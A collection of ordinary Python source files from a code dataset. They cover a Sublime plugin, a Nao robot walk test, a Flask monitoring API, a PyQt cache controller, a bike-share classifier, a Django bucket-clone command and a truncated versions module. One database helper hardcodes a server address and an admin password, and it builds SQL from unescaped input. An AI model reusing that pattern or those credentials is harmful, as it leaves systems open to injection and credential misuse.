+{"seq_id":"613482821","text":"import sublime, sublime_plugin, os, shutil\n# copy saved files into the LAMPP htdocs folder\nclass CopyToLampp(sublime_plugin.EventListener):\n\tdef on_post_save(self, view):\n\t\tdirectory = \"/opt/lampp/htdocs/jsoftsite\"\n\t\tif not os.path.exists(directory):\n\t\t\tos.makedirs(directory)\n\t\tfileName = view.file_name()\n\t\tindex = fileName.index(\".io/\")+3\n\t\trelativePath = fileName[index:]\n\t\tfullPath = directory+relativePath\n\t\tif not os.path.exists(os.path.dirname(fullPath)):\n\t\t\tos.makedirs(os.path.dirname(fullPath))\n\t\tshutil.copy(fileName, fullPath)\n\t\tprint(\"Copied\")","sub_path":"debug/autoDebugSaveToLampp.py","file_name":"autoDebugSaveToLampp.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"284850460","text":"import time\nimport naoqi\nip = \"192.168.1.143\"\nport = 9559\n\npostureProxy = naoqi.ALProxy(\"ALRobotPosture\", ip, port)\nmotionProxy = naoqi.ALProxy(\"ALMotion\", ip, port)\n\n\n# First make the Nao stand still before it can walk\npostureProxy.goToPosture(\"Stand\", 0.8)\n# StandInit?\n\n\n# X = forward speed\n# forward = 1.0, backward = -1.0\nX = 0.5\n\n# Y = sideways speed\n# 1.0 = left, -1.0 = right\nY = 0\n\n# Theta = rotation speed\n# 1.0 = counter-clockwise, -1.0 = clockwise\nTheta = 0.0\n\nmotionProxy.moveToward(X, Y, Theta)\ntime.sleep(10.0)\n\n# stop walking\nmotionProxy.stopMove()\n\n# sit and relax joints\npostureProxy.goToPosture(\"Sit\", 
0.5)\nmotionProxy.rest()\n","sub_path":"Nao tests/tests/walktest.py","file_name":"walktest.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"338221701","text":"from flask import Flask, render_template, jsonify\nfrom db import CPU, Storage, Base, EnvironmentTPH\nfrom flask_cors import CORS\n\nfrom sqlalchemy import create_engine, select\nfrom sqlalchemy.orm import sessionmaker\n\ndb_filename = './data/monitor_data.db'\n\napp = Flask(__name__)\ncors = CORS(app, resources={r\"/api/*\": {\"origins\": \"*\"}})\n\nengine = create_engine(f'sqlite:///{db_filename}')\nsession = sessionmaker()\nsession.configure(bind=engine)\nBase.metadata.create_all(engine)\n\n\ndef set_status(status):\n if status is True:\n return 'Running', 'fa fa-smile', 'bg-success'\n elif status is False:\n return 'Stopped', 'fas fa-angry', 'bg-danger'\n else:\n return 'Unknown', 'fas fa-sad-tear', 'bg-dark'\n\n\n@app.route('/')\ndef index():\n # check to see if cpu-monitor is running\n monitor_cpu = True\n # check to see if storage monitor is running\n monitor_storage = False\n # check to see if environmental monitor is running\n monitor_enviro = None\n\n # set up component dictionaries and set values\n cpu = {}\n cpu['name'], cpu['icon'] = 'CPU', 'fa-microchip',\n cpu['message'], cpu['emoticon'], cpu['class'] = set_status(monitor_cpu)\n\n storage = {}\n storage['name'], storage['icon'] = 'Storage', 'fa-hdd'\n storage['message'], storage['emoticon'], storage['class'] = set_status(\n monitor_storage)\n\n enviro = {}\n enviro['name'], enviro['icon'] = 'Enviro', 'fa-leaf'\n enviro['message'], enviro['emoticon'], enviro['class'] = set_status(\n monitor_enviro)\n\n statuses = [cpu, storage, enviro]\n return render_template('index.html', statuses=statuses)\n\n\n@app.route('/about')\ndef demo_template():\n return render_template('about.html')\n\n\n@app.route('/api/cpu-load/')\ndef cpu_load(qty=1):\n try:\n qty = abs(int(qty))\n except:\n qty = 1\n active_session = session()\n cpu = active_session.query(CPU).order_by(CPU.created_at.desc()).first()\n data = {cpu.id:{\n 'created_at':cpu.created_at,\n 'host_mac':cpu.host_mac,\n 'cpu_temp':cpu.cpu_temp,\n 'gpu_temp':cpu.gpu_temp,\n 'host_name':cpu.host_name,\n 'id':cpu.id,\n 'load':cpu.load,\n 'serial':cpu.serial,\n }}\n return jsonify(data)\n\n\n@app.route('/api/cpu-load')\ndef cpu_load_latest():\n return cpu_load(1)\n\n\n@app.route(\"/api/device-load\")\ndef device_load():\n return {\"error\": None,}\n\n\n@app.route(\"/api/environment/\")\ndef environment(qty=1):\n try:\n qty = abs(int(qty))\n except:\n qty = 1\n active_session = session()\n enviro = active_session.query(EnvironmentTPH).order_by(EnvironmentTPH.created_at.desc()).limit(qty).all()\n enviro_dict = {}\n for row in enviro:\n enviro_dict[row.id]= {\n 'created_at': row.created_at,\n 'host_mac': row.device_mac,\n 'temperature': row.temperature,\n 'pressure': row.pressure,\n 'humidity': row.humidity,\n 'host_name': row.device_name,\n 'id': row.id,\n 'serial': row.device_serial,\n }\n return jsonify(enviro_dict)\n\n\n@app.route(\"/api/environment\")\ndef environment_latest():\n return environment(1)\n\n\n@app.route(\"/api/temperature/\")\ndef temperature(qty=1):\n try:\n qty = abs(int(qty))\n except:\n qty = 1\n active_session = session()\n enviro = active_session.query(EnvironmentTPH).order_by(EnvironmentTPH.created_at.desc()).limit(qty).all()\n enviro_dict = {}\n for row in enviro:\n enviro_dict[row.id] = {\n 'created_at': 
row.created_at,\n 'host_mac': row.device_mac,\n 'temperature': row.temperature,\n 'host_name': row.device_name,\n 'id': row.id,\n 'serial': row.device_serial,\n }\n return jsonify(enviro_dict)\n\n\n@app.route(\"/api/temperature\")\ndef temperature_latest():\n return temperature(1)\n\n\n@app.route(\"/api/pressure/\")\ndef pressure(qty=1):\n try:\n qty = abs(int(qty))\n except:\n qty = 1\n active_session = session()\n enviro = active_session.query(EnvironmentTPH).order_by(EnvironmentTPH.created_at.desc()).limit(qty).all()\n enviro_dict = {}\n for row in enviro:\n enviro_dict[row.id] = {\n 'created_at': row.created_at,\n 'host_mac': row.device_mac,\n 'pressure': row.pressure,\n 'host_name': row.device_name,\n 'id': row.id,\n 'serial': row.device_serial,\n\n }\n return jsonify(enviro_dict)\n\n\n@app.route(\"/api/pressure\")\ndef pressure_latest():\n return pressure(1)\n\n\n@app.route(\"/api/humidity/\")\ndef humidity(qty=1):\n try:\n qty = abs(int(qty))\n except:\n qty = 1\n active_session = session()\n enviro = active_session.query(EnvironmentTPH).order_by(EnvironmentTPH.created_at.desc()).limit(qty).all()\n enviro_dict = {}\n for row in enviro:\n enviro_dict[row.id] = {\n 'created_at': row.created_at,\n 'host_mac': row.device_mac,\n 'humidity': row.humidity,\n 'host_name': row.device_name,\n 'id': row.id,\n 'serial': row.device_serial,\n\n }\n return jsonify(enviro_dict)\n\n\n@app.route(\"/api/humidity\")\ndef humidity_latest():\n return humidity(1)\n\n\ndef get_api_environment():\n return {\"error\": \"Route note implemented\",\n \"temperature\": None,\n \"pressure\": None,\n \"humidity\": None,}\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"monitor_ii/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"188301155","text":"from PyQt5.QtWidgets import QSizePolicy\nfrom PyQt5.QtCore import QObject, pyqtSignal\n\nfrom ui.cache_tree_view import CacheTreeView\nfrom core.data_base import DataBase\n\n\nclass CacheController(QObject):\n item_edited = pyqtSignal(int, str)\n\n def __init__(self, parent=None):\n super(CacheController, self).__init__(parent)\n\n self.__cache_data_base = DataBase()\n\n self.__cache_tree_view = CacheTreeView()\n self.__cache_tree_view.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)\n\n self.__cache_tree_view.item_changed.connect(self.on_item_changed)\n\n def tree_view(self):\n return self.__cache_tree_view\n\n def reset(self):\n self.__cache_data_base.clear()\n self.__cache_tree_view.clear()\n\n def __update_tree_view(self):\n self.__cache_tree_view.clear()\n\n for item_id, v in self.sorted_data().items():\n self.__add_tree_item(item_id, v)\n\n self.__cache_tree_view.expand_all()\n\n def __add_tree_item(self, item_id, item):\n self.__cache_tree_view.add_item(item_id,\n item.parent_id,\n item.value,\n item.exists)\n\n def add_item(self, item_id, item):\n added_item_exists = True\n\n if self.__cache_data_base.has_item(item.parent_id) and not self.__cache_data_base.get_item(item.parent_id).exists:\n item.exists = False\n added_item_exists = False\n\n self.__cache_data_base.add_item(item_id, item)\n\n self.__update_tree_view()\n\n return added_item_exists\n\n def sorted_data(self):\n new_dict = self.__cache_data_base.get_data()\n sorted_dict = {}\n added_parent_ids = []\n\n while new_dict:\n for key, value in new_dict.items():\n if value.parent_id not in self.__cache_data_base.get_ids() or value.parent_id in added_parent_ids:\n 
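# parent already appended (or not tracked at all), so this node can be emitted\n                    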
sorted_dict[key] = value\n new_dict.pop(key)\n added_parent_ids.append(key)\n break\n\n return sorted_dict\n\n def remove_item(self, item_id):\n self.__remove_item(item_id)\n self.__update_tree_view()\n\n def __remove_item(self, item_id):\n item = self.__cache_data_base.get_item(item_id)\n\n if not item:\n return\n\n item.exists = False\n\n for key, value in self.__cache_data_base.get_items():\n if value.parent_id == item_id:\n self.remove_item(key)\n\n def get_item(self, item_id):\n return self.__cache_data_base.get_item(item_id)\n\n def on_item_changed(self, item_id, value):\n if self.__cache_data_base.has_item(item_id):\n self.__cache_data_base.edit_item(item_id, value)\n\n self.item_edited.emit(item_id, value)\n\n def selected_item(self):\n selected_id = self.__cache_tree_view.selected_item_id()\n\n if selected_id is None:\n return None, None\n\n selected_item_id = selected_id if self.__cache_data_base.has_item(selected_id) else None\n\n return selected_item_id, self.__cache_data_base.get_item(selected_item_id)\n\n def enter_item_edit_mode(self, item_id):\n if self.__cache_data_base.has_item(item_id):\n self.__cache_tree_view.enter_item_edit_mode(item_id)\n","sub_path":"core/cache_controller.py","file_name":"cache_controller.py","file_ext":"py","file_size_in_byte":3357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"54983107","text":"# -*- coding:utf-8 -*\n\nimport pyodbc\ncnxn = pyodbc.connect('DRIVER={SQL Server};SERVER=222.204.233.239;DATABASE=CollectDB;UID=sa;PWD=ecnu409s')\ncursor = cnxn.cursor()\n\n\ndef get_data(db_name,table_name,conditions,items = '*',order_by = None):\n if order_by == None:\n sql_qur = \"SELECT \" + items + \" FROM \" + \"[\" + db_name + \"]\" + \".\" + \"[dbo]\" + \".\" + \"[\" + table_name + \"]\" + \" WHERE \" + conditions\n else:\n sql_qur = \"SELECT \" + items + \" FROM \" + \"[\" + db_name + \"]\" + \".\" + \"[dbo]\" + \".\" + \"[\" + table_name + \"]\" + \" WHERE \" + conditions + ' order by ' + order_by\n cursor.execute(sql_qur)\n data = cursor.fetchall()\n return data\n\n\ndef get_student_info(student_id):\n \"\"\"\n 根据学生的学号获取学生的信息\n :param student_id: 学生的学号\n :return: 以字典的的形式返回学生的所有信息,字典的键为customer_id\\card_number\\name\\student_id\\sex\\department\\pass_word\\make_card_date\\national_date\n \"\"\"\n student = {}\n sql_qur = \"SELECT * FROM [CollectDB].[dbo].[Customer] WHERE OutID = '{}'\".format(student_id)\n try:\n cursor.execute(sql_qur)\n student_info = cursor.fetchone()\n student['customer_id'] = student_info[0]\n student['card_number'] = student_info[1]\n student['name'] = student_info[2]\n student['student_id'] = student_info[3]\n student['sex'] = student_info[4]\n student['department'] = student_info[6]\n student['pass_word'] = student_info[7]\n student['make_card_date'] = student_info[8]\n student['national_id'] = student_info[11]\n\n except Exception as e:\n return False\n return student\n\n\n\n\n\n\n\n\n","sub_path":"DataBase/connectSqlServer.py","file_name":"connectSqlServer.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"94891683","text":"#!/usr/bin/env python3\n\nimport sys\n\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport tensorflow.keras as ks\nimport matplotlib.pyplot as plt\n\nimport keras.utils.np_utils as ks_utils\nimport keras.regularizers as reg\n\nfrom sklearn.utils import shuffle\nfrom sklearn.linear_model import 
LinearRegression\n\n\n'''\nAuthor : Gustav Baardsen\nFirst version : January 2019 \n\nA program to predict the class of biker based on data such\nas duration, start station, end station, and bike ID.\n\nThe exercise was suggested on\nhttps://www.analyticsvidhya.com/blog/2018/05/24-ultimate-data-science-projects-to-boost-your-knowledge-and-skills/\nunder the title 'Trip history data set'.\n\nThe required data may be downloaded from\nhttps://s3.amazonaws.com/capitalbikeshare-data/index.html\n\n\nTo write the code below, the tutorial\n\nhttps://www.tensorflow.org/tutorials/keras/basic_classification\n\nwas useful.\n\n'''\n\n\nclass BikingData:\n \n def __init__(self,\n data_file):\n \n self.data = pd.read_csv(data_file)\n \n # Randomly shuffle the rows\n self.data = shuffle(self.data)\n #print(self.data)\n \n # Replace categories by numbers\n self.data['Bike number'] = \\\n self.data['Bike number'].astype('category').cat.codes\n self.data['Member type'] = \\\n self.data['Member type'].astype('category').cat.codes\n \n # Remove columns with categories that are not numbers\n self.data = self.data.drop(['Start date',\n 'End date',\n 'Start station',\n 'End station'],\n axis = 1)\n #print(self.data)\n \n def get_categories(self):\n return self.data.columns\n \n def get_columns(self, col_indices):\n return self.data.get_values()[:, col_indices]\n \n def get_array(self):\n return self.data.get_values()\n\n def print_categories(self):\n \n print('\\nCategories in the data:\\n')\n variables = self.get_categories()\n for i in range(variables.shape[0]):\n print(' ', variables[i])\n \n print('')\n\n def get_values(self,\n variable,\n member_type):\n '''\n Get all values of 'variable' that are associated with\n 'member_type'.\n '''\n member_labels = self.data['Member type'].values\n \n if member_type == 'Casual':\n member_id = 0\n elif member_type == 'Member':\n member_id = 1\n \n this_type = (member_labels.astype(int) == member_id)\n \n return self.data[variable].values[this_type]\n \n def plot_histogram(self,\n variable,\n min_x = None,\n max_x = None):\n '''\n For 'variable', plot separate histograms associated \n with members and non-members.\n '''\n \n # member_labels = self.data['Member type'].values \n \n # members = (member_labels.astype(int) == 1)\n # casuals = np.logical_not(members)\n \n # values_members = variable_values[members]\n # values_casuals = variable_values[casuals]\n\n values_members = self.get_values(variable,\n 'Member')\n values_casuals = self.get_values(variable,\n 'Casual')\n\n variable_values = self.data[variable].values\n \n min_value = np.amin(variable_values)\n max_value = np.amax(variable_values)\n\n if min_x is None:\n min_x = min_value\n if max_x is None:\n max_x = max_value\n \n n_bins = 100\n bin_array = np.linspace(min_x,\n max_x,\n 100) \n plt.hist(values_members, \n bins = bin_array, \n color = 'b',\n histtype = 'step',\n label='Members')\n plt.hist(values_casuals,\n bins = bin_array,\n color = 'r',\n histtype = 'step',\n fill = False,\n label = 'Casuals')\n plt.xlim(min_x, max_x)\n plt.legend(prop={'size': 10})\n plt.xlabel(variable + ' (s)')\n plt.ylabel('Number of smaples')\n\n # Save the plot\n name = 'histogram_' + variable \n plt.savefig(name + '.pdf', format='pdf', dpi=500)\n \n plt.show()\n \n \n \ndef normalize_columns(data):\n '''\n Normalize the columns of the array 'data' so that\n the mean is zero and the standard deviation is one.\n \n data : data[i, j] is the sample i for variable j.\n '''\n \n m = 'Error. 
The parameter \"data\" must be a ' + \\\n 'two-dimensional Numpy.'\n assert len(data.shape) == 2, m\n \n mu = np.mean(data, axis = 0)\n s = np.std(data, axis = 0, ddof = 1)\n \n return (data - mu) / s\n\n\ndef split_columns(data, ratios):\n '''\n Split the columns of the set 'data' into three parts\n according to 'ratios'.\n '''\n assert (len(ratios) == 2) and \\\n (ratios[0] + ratios[1] < 1.0)\n \n n_total = data.shape[0]\n n1 = int(ratios[0] * n_total)\n n2 = min(n1 + int(ratios[1] * n_total),\n n_total)\n \n return data[:n1, :], data[n1:n2, :], data[n2:, :]\n\n\ndef split_data_5050(in_data, out_data):\n '''\n Assume that 'out_data' contains two columns with binary\n classes. Then this functions removes data samples so that\n both classes are represented by an equal amount of \n samples.\n '''\n # Get boolean arrays corresponding to the two classes\n class_0 = (out_data[:, 0].astype(int) == 1)\n class_1 = np.logical_not(class_0)\n\n # Get separate arrays corresponding to the two classes\n [input_0, output_0] = \\\n [in_data[class_0], out_data[class_0]]\n [input_1, output_1] = \\\n [in_data[class_1], out_data[class_1]]\n \n n0 = input_0.shape[0]\n n1 = input_1.shape[0]\n \n n_min = min(n0, n1)\n if n0 < n1:\n \n input_1_50 = input_1[:n_min, :]\n output_1_50 = output_1[:n_min, :] \n\n input_50 = np.append(input_1_50,\n input_0,\n axis = 0)\n output_50 = np.append(output_1_50,\n output_0,\n axis = 0)\n \n elif n0 >= n1:\n\n input_0_50 = input_0[:n_min, :]\n output_0_50 = output_0[:n_min, :]\n\n input_50 = np.append(input_0_50,\n input_1,\n axis = 0)\n output_50 = np.append(output_0_50,\n output_1,\n axis = 0)\n\n # Randomly shuffle the rows\n indices = np.arange(2 * n_min)\n np.random.shuffle(indices)\n\n return input_50[indices, :], output_50[indices, :]\n\n\ndef analyse_output_ratios(predicted_members,\n output_members):\n '''\n '''\n n_all = output_members.shape[0]\n n_pred_member = np.count_nonzero(predicted_members)\n print('\\nNumber of samples predicted as member :',\n '{:>10}'.format(n_pred_member))\n print('Number of samples predicted as non-member :',\n '{:>10}'.format(n_all - n_pred_member))\n \n n_dev_member = np.sum(output_members)\n ratio_nonmember_dev = \\\n float(n_all - n_dev_member) / float(n_all)\n print('\\nTrue ratio (non-members / all) :',\n '{0:14.4f}'.format(ratio_nonmember_dev))\n \n ratio_nonmember_pred = \\\n float(n_all - n_pred_member) / float(n_all)\n print('Predicted ratio (non-members / all) :',\n '{0:14.4f}'.format(ratio_nonmember_pred))\n \n \n ratio_member = \\\n ratio_correctly_predicted_true(predicted_members,\n output_members)\n print('\\nRatio of members that were correctly predicted as members:\\n',\n '{0:14.4f}'.format(ratio_member))\n\n ratio_nonmember = \\\n ratio_correctly_predicted_false(predicted_members,\n output_members)\n print('\\nRatio of non-members that were correctly predicted as non-member:\\n',\n '{0:14.4f}'.format(ratio_nonmember), \n '\\n')\n \n\ndef get_train_test_dev_sets(input_data,\n output_data,\n ratios_train_dev = [0.8, 0.199]):\n '''\n Divide the data set into training, development, and test\n sets.\n '''\n # Normalize the data\n input_norm = normalize_columns(input_data)\n #output_norm = normalize_columns(output_data)\n \n # Divide into training and test sets\n in_train, in_dev, in_test = \\\n split_columns(input_norm,\n ratios_train_dev)\n out_train, out_dev, out_test = \\\n split_columns(output_data,\n ratios_train_dev)\n \n n_train = in_train.shape[0]\n n_dev = in_dev.shape[0] \n n_test = in_test.shape[0] \n 
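# with the default ratios [0.8, 0.199], only ~0.1% of the samples are left for the test set\n    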
print('\\nSize of training set : ',\n '{:>20}'.format(n_train))\n print('Size of development set : ',\n '{:>20}'.format(n_dev))\n print('Size of test set : ',\n '{:>20}'.format(n_test),\n '\\n')\n \n return in_train, in_dev, in_test, \\\n out_train, out_dev, out_test\n\n\ndef setup_trained_network(x_train,\n y_train,\n opt_algorithm = 'adam',\n loss_function = 'mean_absolute_percentage_error',\n error_metrics = ['accuracy'],\n n_per_layer = [8, 8, 8],\n n_iterations = 1,\n n_batch = 30,\n reg_parameters = [0.01, 0.01]):\n '''\n Train a neural network with a given number of layers.\n '''\n \n # Construct a neural network\n network = ks.Sequential()\n network.add(ks.layers.Dense(units = n_per_layer[0],\n activation = tf.nn.relu,\n kernel_regularizer = reg.l1_l2(l1 = reg_parameters[0],\n l2 = reg_parameters[1]),\n input_shape = x_train[0].shape))\n for i in range(1, len(n_per_layer)):\n network.add(ks.layers.Dense(units = n_per_layer[i],\n activation = tf.nn.relu,\n kernel_regularizer = reg.l1_l2(l1 = reg_parameters[0],\n l2 = reg_parameters[1])))\n \n network.add(ks.layers.Dense(units = y_train.shape[1],\n activation = tf.nn.softmax,\n kernel_regularizer = reg.l1_l2(l1 = reg_parameters[0],\n l2 = reg_parameters[1])))\n \n # Choose the optimization method and error metrics\n network.compile(optimizer = opt_algorithm,\n loss = loss_function,\n metrics = error_metrics)\n # Train the neural network\n network.fit(x_train,\n y_train,\n epochs = n_iterations,\n batch_size = n_batch)\n \n return network\n\n\ndef ratio_correctly_predicted_false(predictions,\n labels):\n '''\n Compute the ratio of correctly predicted false values.\n '''\n sum_labels = predictions + labels\n\n n_labels = labels.shape[0]\n n_false = n_labels - np.count_nonzero(labels)\n n_correctly_pred_false = n_labels - \\\n np.count_nonzero(sum_labels)\n return float(n_correctly_pred_false) / float(n_false)\n\n\ndef ratio_correctly_predicted_true(predictions,\n labels):\n '''\n Compute the ratio of correctly predicted true values.\n '''\n correctly_predicted_true = predictions * labels\n\n n_true = np.count_nonzero(labels)\n n_correctly_pred_true = np.sum(correctly_predicted_true)\n \n return float(n_correctly_pred_true) / float(n_true)\n \n\ndef classify_from_float_0_1(predictions):\n '''\n predictions : Array with float numbers between zero \n and one, representing probabilities\n for zero and one.\n '''\n return (predictions > 0.5).astype(int)\n\n\ndef ratio_same_value(array1,\n array2):\n '''\n Ratio of elements that are the same in both arrays.\n '''\n m = 'The input arrays \"array1\" and \"array2\" must ' + \\\n 'both be Numpy arrays of the same lenght and ' + \\\n 'type int.'\n assert (type(array1) == np.ndarray) and \\\n (type(array2) == np.ndarray) and \\\n (array1.dtype == int) and \\\n (array2.dtype == int) and \\\n (array1.shape == array2.shape), m\n \n n_total = array1.shape[0]\n n_same = np.sum(array1 == array2)\n \n return float(n_same) / float(n_total)\n\n\nclass NNPredictor:\n '''\n Class for prediciton using a neural network.\n '''\n network = None\n \n def __init__(self,\n input_train,\n input_dev,\n input_test,\n output_train,\n output_dev,\n output_test):\n \n self.in_train = input_train\n self.in_dev = input_dev\n self.in_test = input_test\n self.out_train = output_train\n self.out_dev = output_dev\n self.out_test = output_test\n \n def train_network(self,\n optimization = 'adam',\n loss = tf.losses.softmax_cross_entropy,\n metrics = ['accuracy'],\n n_neurons = [8, 8, 8],\n n_mainloop = 4,\n batch_size = 30,\n 
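# l1/l2 regularization weights forwarded to every Dense layer\n                      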
reg_params = [0.01, 0.01]):\n '''\n Train a neural network using self.x_train and \n self.y_train.\n '''\n self.network = setup_trained_network(self.in_train,\n self.out_train,\n opt_algorithm = optimization,\n loss_function = loss,\n error_metrics = metrics,\n n_per_layer = n_neurons,\n n_iterations = n_mainloop,\n n_batch = batch_size,\n reg_parameters = reg_params)\n \n def validate(self,\n input_val,\n output_val,\n plot = False):\n '''\n Validate the trained network.\n '''\n m = 'Error. The neural network has not been trained.'\n assert self.network is not None, m\n \n # Test the optimized network\n loss, metrics = self.network.evaluate(input_val,\n output_val)\n print('\\nError in the development set:')\n print('\\nLoss:', loss)\n print('Accuracy:', metrics, '\\n')\n\n \n if plot:\n\n predictions = self.network.predict(input_val)\n \n n = input_val.shape[0]\n points = np.arange(n)\n \n predict = np.argmax(predictions,\n axis = 1)\n output_dev = np.argmax(output_val,\n axis = 1)\n \n v = Visualiser1D(x_points = [points, points],\n y_points = [output_dev, predict],\n colors = ['b', 'r'],\n markers = ['s', '^'],\n linetypes = ['None', 'None'],\n labels = ['Correct values', 'Predictions'])\n n_plots = 10\n for i in range(n_plots):\n v.make_plot(x_limits = [50*i, 50*(i+1)],\n y_limits = [0, 1.5])\n \n def test(self):\n '''\n Test the trained network.\n '''\n predictions = network.predict(self.in_test)\n print('\\nPrediction; Correct value')\n for i in range(self.in_test.shape[0]):\n \n print(predictions[i, 0], self.out_test[i, 0])\n #print(x_test[i, :], y_test[i, 0])\n \n print('')\n\n def get_predictions(self,\n in_data):\n predictions_float = self.network.predict(in_data)\n return np.argmax(predictions_float,\n axis = 1)\n\n\ndef plot_covariance(data):\n '''\n Plot the covariance matrix of 'data'.\n \n data : data[i, j] is the sample i for variable j.\n '''\n normalized_data = normalize_columns(data)\n covariance = np.cov(np.transpose(normalized_data), ddof = 1)\n \n print('\\nCovariance matrix for the data:\\n')\n n = covariance.shape[0]\n \n for i in range(n):\n for j in range(n):\n print('{0: .4E}'.format(covariance[i, j]),\n end = \" \")\n print('')\n print('')\n \n \n plt.imshow(np.absolute(covariance))\n plt.colorbar()\n \n plt.title('Absolute values of the covariance matrix')\n \n items = np.arange(n, dtype=int)\n values = ['Duration',\n 'Start station',\n 'End station',\n 'Bike',\n 'Member type']\n plt.xticks(items, values, size = 8)\n plt.yticks(items, values, size = 8)\n\n # Save the plot\n name = 'covariance' \n plt.savefig(name + '.pdf', format='pdf', dpi=500)\n \n plt.show()\n\n \n \n \nclass Visualiser1D:\n '''\n Class for 1D plots.\n '''\n def __init__(self,\n x_points,\n y_points,\n colors,\n markers,\n linetypes,\n labels):\n \n m = 'Error. The lists x_points, y_points, and ' + \\\n 'labels must have the same lengths.'\n assert (len(x_points) == len(y_points)) and \\\n (len(labels) == len(x_points)) and \\\n (len(colors) == len(x_points)) and \\\n (len(markers) == len(x_points)) and \\\n (len(linetypes) == len(linetypes)), m\n \n for i in range(len(x_points)):\n m = 'Error. 
Each Numpy array x_points[i] must ' + \\\n 'have the same lenght as the corresponding ' + \\\n 'array y_points[i].'\n assert x_points[i].shape == y_points[i].shape, m\n \n self.x_points = x_points\n self.y_points = y_points\n self.colors = colors\n self.markers = markers\n self.linetypes = linetypes\n self.labels = labels\n \n def make_plot(self,\n legend_location = 'upper right',\n line_type = 'None',\n x_limits = None,\n y_limits = None):\n \n fig = plt.figure(figsize=(7, 7), dpi=100)\n ax = plt.gca()\n \n n_graphs = len(self.x_points)\n for i in range(n_graphs):\n \n ax.plot(self.x_points[i],\n self.y_points[i],\n color = self.colors[i],\n marker = self.markers[i],\n linestyle = self.linetypes[i],\n label = self.labels[i])\n \n # Legend\n l = plt.legend(loc = legend_location,\n labelspacing = 0.1)\n frame = l.get_frame()\n frame.set_lw(0.6)\n \n ax.set_xlim(x_limits)\n ax.set_ylim(y_limits)\n \n plt.show()\n \n \ndef main():\n \n #\n # Before running the program, download the data from\n #\n # https://s3.amazonaws.com/capitalbikeshare-data/index.html\n #\n # The program is run by calling ./analysis.py.\n #\n data_file = '2017Q1-capitalbikeshare-tripdata.csv'\n \n data = BikingData(data_file)\n\n data.print_categories()\n data.plot_histogram('Duration',\n max_x = 10000)\n data.plot_histogram('Start station number')\n data.plot_histogram('End station number')\n data.plot_histogram('Bike number')\n \n input_data = data.get_array()[:, :4]\n output_data = data.get_array()[:, 4:5]\n \n\n # Plot the covariance matrix between the variables\n plot_covariance(data.get_array())\n \n \n output_data_c = ks_utils.to_categorical(output_data,\n num_classes = 2)\n \n # Partition the data set into training, development,\n # and test sets. The input and output data are also\n # normalized.\n input_train, input_dev, input_test, \\\n output_train, output_dev, output_test = \\\n get_train_test_dev_sets(input_data,\n output_data_c)\n \n # First, classify using linear regression with\n # a least-squares error functional\n regressor = LinearRegression()\n regressor.fit(input_train,\n output_train[:, 1])\n output_linreg = regressor.predict(input_dev)\n\n predictions_reg = \\\n classify_from_float_0_1(output_linreg)\n correct_members = \\\n output_dev[:, 1].astype(int)\n accuracy = ratio_same_value(predictions_reg,\n correct_members)\n print('\\nClassification accuracy of linear regression:',\n accuracy,\n '\\n')\n\n \n # Create a neural-network predictor object\n analyser = NNPredictor(input_train,\n input_dev,\n input_test,\n output_train,\n output_dev,\n output_test)\n \n opt_algorithm = 'adam'\n loss_function = tf.losses.softmax_cross_entropy\n error_metrics = ['accuracy']\n n_per_layer = [4, 4, 4]\n n_iterations = 4\n n_batch = 500\n reg_parameters = [0.0, 0.0]\n \n print('Next, a neural network is trained...')\n analyser.train_network(optimization = opt_algorithm,\n loss = loss_function,\n metrics = error_metrics,\n n_neurons = n_per_layer,\n n_mainloop = n_iterations,\n batch_size = n_batch,\n reg_params = reg_parameters)\n\n make_plots = True\n analyser.validate(analyser.in_dev,\n analyser.out_dev,\n plot = make_plots)\n \n # Array containing ones for 'Member' and zeros for 'Casual'\n predicted_members = \\\n analyser.get_predictions(analyser.in_dev)\n output_members_dev = \\\n output_dev[:, 1].astype(int)\n \n analyse_output_ratios(predicted_members,\n output_members_dev)\n #print(data.get_categories())\n \n \nif __name__ == \"__main__\":\n main()\n \n \n 
\n","sub_path":"capitalbike/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":23160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"94430377","text":"from django.core.files.storage import default_storage\nfrom django.core.management.base import BaseCommand\nfrom django.core.management import call_command\n\n\nclass Command(BaseCommand):\n help = 'Clone one bucket to another'\n args = '(, )'\n\n def handle(self, *args, **options):\n SOURCE_BUCKET_NAME = args[0]\n DESTINATION_BUCKET_NAME = args[1]\n if DESTINATION_BUCKET_NAME == SOURCE_BUCKET_NAME:\n return\n connection = default_storage.connection\n source_bucket = connection.get_bucket(SOURCE_BUCKET_NAME)\n destination_bucket = connection.get_bucket(DESTINATION_BUCKET_NAME)\n destination_bucket.delete_keys(destination_bucket.list())\n for key in source_bucket.list():\n key.copy(DESTINATION_BUCKET_NAME, key.name)\n","sub_path":"libs/common/management/commands/clone_bucket.py","file_name":"clone_bucket.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"358345221","text":"# coding: utf-8\n\n\n\"\"\"Authoritative listing of image and package versions used in the project.\n\nThis module MUST be kept valid in a standalone context, since it is intended\nfor use in tests and documentation as well.\n\"\"\"\nimport operator\nimport json\n\nfrom collections import namedtuple\nfrom pathlib import Path\nfrom typing import Any, cast, Dict, Optional, Tuple\n\n\nImage = namedtuple(\"Image\", (\"name\", \"version\", \"digest\"))\n\n# Project-wide versions {{{\n\nCALICO_VERSION: str = \"3.19.1\"\nK8S_VERSION: str = \"1.21.2\"\nSALT_VERSION: str = \"3002.6\"\nCONTAINERD_VERSION: str = \"1.4.3\"\nSOS_VERSION: str = \"< 4.0\"\n\nCALICO_RELEASE: str = \"1\"\nCONTAINERD_RELEASE: str = \"3\"\nSOSREPORT_RELEASE: str = \"2\"\n\n\ndef load_version_information() 